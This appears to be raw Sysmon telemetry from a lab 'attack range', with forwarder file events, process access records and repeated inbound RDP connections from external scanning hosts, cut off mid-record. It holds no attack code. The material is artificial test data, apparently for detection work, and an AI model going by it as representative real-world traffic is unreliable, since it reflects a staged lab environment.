AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57426-false10.0.1.12-8000- 23542300x800000000000000062663Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:24.817{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58C7B54D746647CEBA2CAB5273157D34,SHA256=8399B538BC8A24DD8B3B7E9A8C22FFC7A4F7E59ACD1ECFF40CA38550AEB0D500,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048988Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:24.898{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB06BCCCC45D60F71B0BC99549E4A1D9,SHA256=B39B19EA66A73923CCF81CDC071988C2CAC047633A4A8AE864128EB07D713427,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062662Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:24.708{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=112CFEB6A303D264BE5A17E75784B2A0,SHA256=0812E44C589E5695E882CCA27B0A88F86D0B85B2A2B8676D06B49FFC045FB524,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062661Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:23.128{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-43381-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062660Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:23.045{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-46117-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062659Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:23.011{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com60329-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000048987Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:24.242{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=82BD7609E7F6B5D5584EC5294EA37676,SHA256=766A9CB90B97F0F817CDF241C5AFB43EC92F88C3F36A882741D82D69774EE39F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000048986Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:22.606{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-56680-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000048989Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:25.902{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=366986EC21FA0591AEFF026907358042,SHA256=5A3E58A566342C6ED5EF654AF99A4EF52F104DE01598E8366E033F16DDE6C54F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062665Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:25.833{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F54EDBA735DA1440DD9E12243EB2F7B,SHA256=4E4D105FE79F65C8EFDE40549CD8CDC80738D38484927F6BAD32E84DBCB78364,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062664Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:25.349{A7A01FEF-B626-607E-1000-00000000BB01}1168NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=A7292415FC8A45863F2B4DD25FB22337,SHA256=FFE51845DCE6AE33E29E8FA579A8F0FFAFA4A4C65DC114BB02AE056F6315294B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062668Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:26.849{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F3FDABEF5D360DEFB77BBED07C3A717,SHA256=F4410F61757AD927FDC0E1D431A0ECEF4D1B45C4953725B81FC994E960563FB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048992Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:26.933{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD25E4AB652C843F93148844800EF1C3,SHA256=A6331B1AB9CE23A6BBB5DFFC671087AE3A609C2C66CFEFD8EF0C6F7DEBC57A73,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000048991Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:23.227{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52458-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x800000000000000048990Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:26.199{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1BF954E80072E96A1D8715F1ABA42901,SHA256=F27983A9198C55AA5E0CDE99E475219D24B8022BD02D0C04376E6F9EABCCD694,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062667Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:24.524{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-47486-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000062666Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:26.036{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1FFB06EA361A86BA7D8E35953A2A1232,SHA256=A74DA9E30AE95A5B95B11429E2089BE6F7D726DAA508518B7BA9659FD2586D4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048993Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:27.964{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D88283BC593E3DE49491E764DACFB7A,SHA256=1587106AE97128BDA0A36381AB50186A758A34399923346E73B5EB8FC05E94E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062669Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:27.864{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAAA41AC8648A7BE802B0649ACC30B57,SHA256=A10D50318862E8876FE13CABB186A6723C2B262B63BFEB71AF409185BA31E289,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062673Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:28.880{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F3DC19F1818DCDA527D6AA482E586FE,SHA256=3E0CE33F10834FBBFF6D9F754517A9062A59DD02184CE205F04DC4E8A671B9DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000048998Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:28.965{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=085A00B3F88F6B9FBCF60F52FE33B6E8,SHA256=41015444E2605F35E8169F632BA8EBD7E7DBEAF69EB3B3663F81F29D59C2975F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000048997Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:26.226{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com63391-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000048996Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:25.720{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-59640-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000048995Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:25.715{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52459-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000048994Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:28.324{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8EF30868C8119181CEEF3C3BCF343527,SHA256=D9C5E33226816C2F2F879061092E4820CD9585E8301188DA4B1D6013F454F5E0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062672Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:27.109{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57427-false10.0.1.12-8000- 354300x800000000000000062671Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:27.006{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com62878-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000062670Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:28.036{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=75E77ABD7E5C3A872E900172DC466B65,SHA256=F8408944A396A3FE0C569DA9040462615DEF4D667993538DE32393A1324F1F54,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049000Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:29.996{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCDF9DBD75B93DAB5D0D697B471EAA31,SHA256=4C37D483DF2C6E21CC23C99F3D9B421CE553F3BB051CC4AA0436B2F9A9A71583,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062675Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:29.895{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84A2223E9A2861C09427DB7D1B40DA69,SHA256=AEC0BA811EB1256353B099C8CDC70820106DD5ABD46E5FF295FC510C1DC5B9E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062674Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:27.558{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-50229-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000048999Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:27.171{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-58159-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000062685Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:30.942{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1214681C5066FBD0A2E6300A1700EBA9,SHA256=4B476B740F739B140B6D6E5505706231D9F284FCA11812F5ABB97A5C72408B20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049001Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:30.324{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BB5CB12717C223082B7C3D34372B23C1,SHA256=C7E28A46A9E81AAEF2E1CA37B543B80EE57BAB9D33EB63DDA32F79E079431B61,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000062684Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:30.911{A7A01FEF-C0A6-607E-8105-00000000BB01}8366128C:\Windows\Explorer.EXE{A7A01FEF-DFEF-607E-A109-00000000BB01}6196C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062683Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:30.911{A7A01FEF-C0A6-607E-8105-00000000BB01}8366128C:\Windows\Explorer.EXE{A7A01FEF-DFEF-607E-A109-00000000BB01}6196C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062682Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:30.911{A7A01FEF-C0A6-607E-8105-00000000BB01}8366128C:\Windows\Explorer.EXE{A7A01FEF-DFEF-607E-A109-00000000BB01}6196C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062681Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:30.895{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-DFEF-607E-A109-00000000BB01}6196C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+628b0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062680Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:30.895{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-DFEF-607E-A109-00000000BB01}6196C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bd0|C:\Windows\System32\SHELL32.dll+6286c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062679Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:30.895{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-DFEF-607E-A109-00000000BB01}6196C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062678Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:30.895{A7A01FEF-C0A6-607E-8105-00000000BB01}8365152C:\Windows\Explorer.EXE{A7A01FEF-DFEF-607E-A109-00000000BB01}6196C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000062677Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:29.078{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-48854-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000062676Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:30.755{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A3549E340FDEE4CD2A1F4C00F60D6788,SHA256=58ACD547A26E69674995197A383B4D753FDEF9093DAD3ABE908E01525E2C400D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062688Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:31.958{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D67E216B209B3A42C1727EACC66665B,SHA256=7F95F24493D614545C4B3018AAB74BC189EDE86954653C77928D713835442F25,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049004Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:28.966{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-62608-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049003Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:31.402{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AF40DA09689CE7BC13990B76068C9CD1,SHA256=9050F325A9A5D8299968257DCEA80A4D21D82CAE27CF905B1C46BCE4AAC7ED27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049002Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:31.027{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC247795A00AF72E936CCE52C0A0EE06,SHA256=EB68BDDD1401AA73A6A974F57F8C39A87335CB38BF0320AD375B268E0214CFFE,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062687Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:30.535{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-52965-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062686Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:30.063{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com51389-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000062691Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:32.989{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06A3B146AAECA3E1B47C68CC845BFF23,SHA256=618BADBFF3E08835EAE7E38C8527DE512A9F530557EC190E78667487C7897BFB,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062690Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:31.532{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com54560-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000062689Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:32.052{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A73E4E66FAA0C0E8545DFB8CB6AD7FB6,SHA256=AB184DFCD6A429D530780075B88DD377AA10438AB8765DCD49B6B3CDF0F8F728,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049006Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:29.787{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com51859-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049005Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:32.074{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CA997A2FD026EB040680CABE751CFFA,SHA256=2146A9DD79B5806F7A53A2483BA7D11F9A390952CB326F728CBDE56145C3EC8F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049010Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:31.404{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-64090-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049009Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:52:31.365{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 